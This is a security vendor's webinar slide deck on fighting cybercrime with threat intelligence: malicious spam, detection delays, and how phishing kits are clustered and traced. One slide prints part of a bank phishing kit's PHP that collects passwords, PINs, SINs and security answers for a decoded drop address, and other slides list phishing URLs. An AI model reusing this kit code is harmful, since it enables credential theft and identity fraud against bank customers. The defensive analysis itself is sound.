CONFIDENTIAL 1

Thank you for joining us today for

How to Fight Cybercrime with Enterprise Security Intelligence

The webinar will begin shortly…

CONFIDENTIAL 2

What do you do with an Infected PC?Some organizations

say: Our policy is to re-

image the computer. No exceptions.

• Does that sound familiar?

• We hear the argument that this is the safest option.

• What’s the worst that can happen?

CONFIDENTIAL 3

What is the Worst Case Scenario?

CONFIDENTIAL 4

What is YOUR worst case scenario?

Data breach involving Intellectual Property?

Direct Financial Loss?Data Breach Involving PII?

CONFIDENTIAL 5

Verizon 2013 Data Breach Investigations Report

Study of 47,000 security incidents with 621 confirmed data breaches, of which

40% were caused by malware

47% of those malware attacks originated with an E-mail attachment

In Large Enterprises, 63% of malware attacks originated with an Email attachment.

“Keep in mind that these vectors are not mutually exclusive. In many cases, an actor may gain initial entry using a malicious e-mail attachment and then install additional malware on that and other systems throughout the environment.”

CONFIDENTIAL 6

The Inevitable Click

• How many emails do I have to send your employees to get someone to click?

• If I send 3: 50% chance; If I send 10: Guaranteed

ThreatSim.com Quoted in Verizon DBIR

CONFIDENTIAL 7

Recent Threats

CONFIDENTIAL 8

Top malicious spamYesterday

From: "Gregorio Mack" <Gregorio.Mack@intuit.com>Subject: FW: Invoice 0043412

CONFIDENTIAL 9

This is what the AV detection looked like for yesterday morning’s most prevalent malicious spam campaign.

One & a half hours into the campaign, detection was only 4/48.

CONFIDENTIAL 10

Same malware, 18 hours later…now we see 26 of 48 vendors detecting

CONFIDENTIAL 11

ATTACK!Now, what if AFTER all of that happens, we realize that the original email had a malicious attachment, and so we send a PC tech to format machine of initial victim?

TOP SECRET

CONFIDENTIAL 12

Long Detect Times

• Mandiant reported in M-Trends 2013: Attack the Security Gap that the median number of days from evidence of compromise to discovery of compromise was 243 DAYS!

• General Keith Alexander told an audience at Georgia Tech:

Most of the folks who get into the [DoD] networksare in there for six to nine months before they’re

discovered.

CONFIDENTIAL 13

Malware Intelligence1. What CAN THIS MALWARE DO?2. Where did it come from?

a) What was the initial attack vector?b) Has that vector contacted any other resource?

3. What does this computer HAVE ACCESS TO?4. What has the compromised computer DONE?

a) Received additional files?b) Ex-filtrated data?c) Are there any new accounts or files since the

compromise?d) Exceeded or attempted to exceed authority on

any internal resources?

CONFIDENTIAL 14

Today’s Top Threat

• Each day we document the behavior of the most prevalent malicious spam campaigns, reviewing interactions with the file system, network traffic, and registry changes.–What is the spam subject?–What hostile URLs are advertised?–What hostile attachments are present?–What network touches does the malware

make?–What additional malware drops if

executed?

CONFIDENTIAL 15

What is Cyber Intelligence?

The acquisition and analysis of information to identify, track, and predict cyber capabilities, intentions, and activities that offer courses of action to enhance decision making.

CONFIDENTIAL 16

Email-based Threats

CONFIDENTIAL 17

http://www.go-polymers.com/components/rbc/index.php

February 27, 2013

CONFIDENTIAL 18

http://www.go-polymers.com/flash/hsbc.com.bh12idv/Authentication/idv.Authentication.htm

February 27, 2013

CONFIDENTIAL 19

http://www.go-polymers.com/admin/authentication.bns_Scotiabank/

authentication.bns.htm

February 22, 2013

CONFIDENTIAL 20

Phishing Timeline (Takedown View)

GOAL: Protect customer credentials by improving takedown speed. Time is

Money.

CONFIDENTIAL 21

Phishing Clusters• For a single brand, we group the many

attacks into clusters of similar phish.• Phishing sites in the same cluster are

composed of highly-similar file sets.

CONFIDENTIAL 22

Trend AnalysisBy using the Conditional Formatting feature in i2, we can identify emerging threats.

Phishing sites that were identified in the current month are red and enlarged, while older phish are grayed-out.

CONFIDENTIAL 23

Phishing KitsPhishing sites are usually made by hacking an existing web site and uploading a set of files necessary to create the look and feel of the brand being imitated.

Action files, usually with a .PHP extension, handle the business of sending the stolen data to the criminal via an email message.

When a criminal has a kit that proves successful, they tend to re-use the kit until something stops them.

CONFIDENTIAL 24

Confirm.php<?php$ip = $_SERVER['REMOTE_ADDR'];$user = $_POST['user'];$pass = $_POST['pass'];$q1 = $_POST['q1'];$a1 = $_POST['a1'];$q2 = $_POST['q2'];$a2 = $_POST['a2'];$q3 = $_POST['q3'];$a3 = $_POST['a3'];$sin1 = $_POST['sin1'];$sin2 = $_POST['sin2'];$sin3 = $_POST['sin3'];$dobd = $_POST['dobd'];$dobm = $_POST['dobm'];$doby = $_POST['doby'];$dl = $_POST['dl'];$issue = $_POST['issue'];$pin = $_POST['pin'];$email = $_POST['email'];$emailp = $_POST['emailp'];

$data ="--------- G00dLuck ---------User: $userPass: $pass-----Q1: $q1A1 $a1Q2: $q2A2 $a2Q3: $q3A3 $a3----Dob: $dobd - $dobm - $dobySIN : $sin1 - $sin2 - $sin3Dl : $dl Pin: $pin Issue: $issueE-mail: $email / $emailp--Ip: $ip--------- G00dLuck ---------";$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t'); $emailusr2 = base64_decode('');

$subj="RBC # $user - $pass - $doby - $dl";

$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t');

Which decodes to: sofotex2@gmail.com

CONFIDENTIAL 25

Overlaying Drop Email data• Each red dot indicates a criminal’s

email address.• More lines = more phishing sites for

that address.

CONFIDENTIAL 26

Phishing Timeline (Intelligence View)

GOAL: Drive Major Criminals Away from OUR BRAND

CONFIDENTIAL 27

https://PhishIQ.com/submit• We’re always

looking for new sources of phishing or spam data.

• An online form is available, but feel free to contact us if you are a high-volume contributor.

CONFIDENTIAL 28

Thank you!

Shortly after the webinar, these slides will be available where you registered at:

http://info.malcovery.com/fight-cybercrime-with-enterprise-security-intelligence

Connect with us on LinkedIn by joining the groupEnterprise Security Intelligence and Big Data

Follow us on Twitter: @malcovery

CONFIDENTIAL 29

Best Case Scenario

• Malware was detected today• A clear source of infection is readily

identifiable from today• Only a single “unexplained” EXE or

DLL is found on the machine, and it matches the signature

• The malware is well understood, widely detected, and has a clear and limited purpose

CONFIDENTIAL 30

Our Porous Perimeters• Is the machine mobile?• Is it “forced VPN” back to our organization?• If mobile, and if unlimited access – we don’t

know what it did at or outside the perimeter because we don’t control the perimeter

• Home network, Starbucks wifi, hotel wifi – data exfil could occur in places where we don’t monitor the network